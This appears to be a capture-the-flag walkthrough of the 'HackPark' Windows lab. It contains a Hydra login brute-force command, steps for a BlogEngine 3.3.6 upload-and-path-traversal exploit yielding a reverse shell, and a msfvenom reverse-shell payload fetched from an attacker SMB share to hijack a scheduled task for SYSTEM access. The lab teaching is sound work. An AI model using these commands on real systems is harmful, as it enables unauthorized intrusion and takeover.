HackPark

Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine!

Scanning

Nmap

root@ip-10-10-168-173:~# nmap -A -T4 10.10.134.173

Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-22 10:57 BST
Nmap scan report for ip-10-10-134-173.eu-west-1.compute.internal (10.10.134.173)
Host is up (0.00063s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries 
| /Account/*.* /search /search.aspx /error404.aspx 
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open  ssl     Microsoft SChannel TLS
. . .
[SNIP]
. . . 
Running (JUST GUESSING): Microsoft Windows 2012 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE
HOP RTT     ADDRESS
1   0.63 ms ip-10-10-134-173.eu-west-1.compute.internal (10.10.134.173)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.99 seconds

Enumeration

Port 80

/Account/login.aspx login form in this directory

lets brute force this form with hydra

hydra -l [username] -P [passlist] $IP -V http-form-post "[directory]:[form_parameters]:[grep]"

form_parameters catch it with burpsuite

root@ip-10-10-168-173:~# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.134.173 -V http-form-post "/Account/login.aspx:__VIEWSTATE=b2CwLD0IPIzi7dLkyFWxkUryHhGnfYBRJyHrnU51xAbBhuUwFAKBG8T%2B%2B4huI8mfPiS0TnaLjBjDlN9dsQldDKOCacxfC7Gb6U%2B3e4xJbM1W%2BJrtJKrk705XrtJdX0%2BzRS3kmPSRjnsZ4VXmErgCZv6KwqbM6zmvKTSBnwQvVqmAhdevyUTi4tHSWsm1rSHsdS4Eo7giMx9u8d7fq7AyoucAM%2BwDHWeIn8hza%2B5HhpNgPcR67DuiJDK%2BcU7mbTUlkjSIn5oTcBeO1rjN4YMtfUn3gWFFutzWl8uUM7VogMzF0rIc2GJQZivNJv4749BCv0BgF0GWOxO2djsNcXB2R8FcQz7Txb2%2BcwY8xQAOZppirCfb&__EVENTVALIDATION=jBouW2RsCmg724dGBlbjFjo1G8xmqa0B7bYYok4D5ZNpiyl%2FDRWH5RcqOKSz9RNrhSf%2B9wldEYwPOH268Vauf4%2BREC1ZME4QLEs8DUf8gK0LC4QlRumMJskzmyATujGX0RlsBDZJlmlzRXYYcGiwjt0KIDSkjKZJGk7MBKlEESLfCz0H&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
. . .
[SNIP]
. . . 
[80][http-post-form] host: 10.10.134.173   login: admin   password: 1qaz2wsx

Credentials admin:1qaz2wsx

WE IN

ABOUT tab we can find the version of BlogEngine 3.3.6.0

Initial Access

search exploit for this blog engine v3.3.6.0

Attack:

First, we set the TcpClient address and port within the method below to 
our attack host, who has a reverse tcp listener waiting for a connection.

Next, we upload this file through the file manager.  In the current (3.3.6)
version of BlogEngine, this is done by editing a post and clicking on the 
icon that looks like an open file in the toolbar.  Note that this file must
be uploaded as PostView.ascx. Once uploaded, the file will be in the
/App_Data/files directory off of the document root. The admin page that
allows upload is:

http://10.10.10.10/admin/app/editor/editpost.cshtml

Finally, the vulnerability is triggered by accessing the base URL for the 
blog with a theme override specified like so:

http://10.10.10.10/?theme=../../App_Data/files

Let’s follow the instructions:

1. Start by modifying the script so that we report the correct value for IP and port.

2. Rename your script as PostView.ascx

3. Go to posts (http://10.10.79.198/admin/#/content/posts) and click on “Welcome to HackPark” to edit this post

4. From the edit bar on top of the post, click on the “File Manager” icon

5. Click on the “+ UPLOAD” button and upload the PostView.ascx script

6. Close the file manager and click on “Save”

7. Now, open your listener (rlwrap nc -nlvp 1234)

8. Go to http://10.10.79.198/?theme=../../App_Data/files

now we have reverse shell

$ rlwrap nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.79.198.
Ncat: Connection from 10.10.79.198:56475.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
whoami
c:\windows\system32\inetsrv>whoami
iis apppool\blog

• Service Shell

Windows Privilege Escalation

Enumerate running services

C:\> net start
OR
C:\> sc queryex type=service state=all | find /i "SERVICE_NAME:"

WindowsScheduler.exe looks interesting

check it's privilege

running localSystem Priv ...

C:\> cd "c:\program files (x86)"
C:\> dir
Common Files
Internet Explorer
Microsoft.NET
SystemScheduler
Uninstall Information
Windows Mail
Windows NT
WindowsPowerShell
desktop.ini

C:\> cd SystemScheduler
C:\> ls
Events
Forum.url
License.txt
LogFile.txt
LogfileAdvanced.txt
Message.exe
PlaySound.exe
PlayWAV.exe
Preferences.ini
Privilege.exe
ReadMe.txt
RunNow.exe
SSAdmin.exe
SSCmd.exe
SSMail.exe
Scheduler.exe
SendKeysHelper.exe
ShowXY.exe
ShutdownGUI.exe
WSCHEDULER.CHM
WSCHEDULER.HLP
WSCtrl.exe
WSLogon.exe
WSProc.dll
WScheduler.cnt
WScheduler.exe
WService.exe
Website.url
WhoAmI.exe
alarmclock.ico
clock.ico
ding.wav
libeay32.dll
sc32.exe
schedule.ico
ssleay32.dll
unins000.dat
unins000.exe
whiteclock.ico

C:\> cd events
C:\> ls
20198415519.INI
20198415519.INI_LOG.txt
Administrator.flg
SYSTEM_svc.flg
Scheduler.flg
SessionInfo.flg
service.flg

C:\> type 20198415519.INI_LOG.txt
08/04/19 16:44:05,Process Ended. PID:2228,ExitCode:1,Message.exe (Administrator)
08/04/19 16:45:00,Event Started Ok, (Administrator)
08/04/19 16:45:20,Process Ended. PID:2640,ExitCode:1,Message.exe (Administrator)
08/04/19 16:46:00,Event Started Ok, (Administrator)
08/04/19 16:46:03,Process Ended. PID:2912,ExitCode:1,Message.exe (Administrator)
08/04/19 16:47:00,Event Started Ok, (Administrator)

Message.exe running every 30 second lets overwrite it with reverse shell

generate reverse shell with metasploit

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f exe -o rev.exe

setup smb server on attacker box

on target box

copy \\[attacker_ip]\[share_name]\rev.exe "C:\Program Files (x86)\SystemScheduler\Message.exe"

setup listener

after 30 seconds we have system shell

• System Shell